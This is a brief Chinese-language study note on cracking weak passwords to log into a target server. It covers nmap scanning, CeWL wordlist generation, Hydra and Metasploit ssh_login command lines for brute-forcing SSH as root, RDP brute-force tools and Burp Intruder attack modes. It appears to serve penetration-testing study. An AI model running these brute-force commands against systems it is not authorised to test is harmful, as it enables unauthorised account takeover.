Weak Password Burst

弱口令破解登陆目标服务器

信息收集

nmap
20:ssh 80:http

SSH爆破之字典

• Cewl制作字典
  cewl -d 2 -m 5 -w word.txt 网址
  根据提供信息，随机生成一套弱口令密码,密码制作网站:
  https://bugku.com/mima/

  Hydra爆破SSH

  kali自带
  hydra -I 用户名(-L 用户名字典) -p 密码(-P word.txt) 网址 -s 端口(开放状态) ssh -f(找到一个终止)

  MSF模块爆破SSH

  search login关于登陆相关模块
  use auxiliary/scanner/ssh/ssh_login
set rhosts 目标ip
set rport 端口
set username root
set pass_file/root/Desktop/word.txt
set threads 10
run

  Hydra爆破RDP(远程桌面协议)

  爆破电脑解锁密码

  爆破工具

御剑RDP爆破工具
超级弱口令检查工具

burp爆破

之前就使用过很多了，补充一些不知道的功能。
Pitchfork(叉子模式)
设置几组变量，就有几组payload，请求数量是最小payload组中的payload数量。
Cluster bomb(炸弹模式)
与鱼叉类似，不过不是一一对应，而是一对多，循环搭配组合，请求数量是各payload数量的乘积。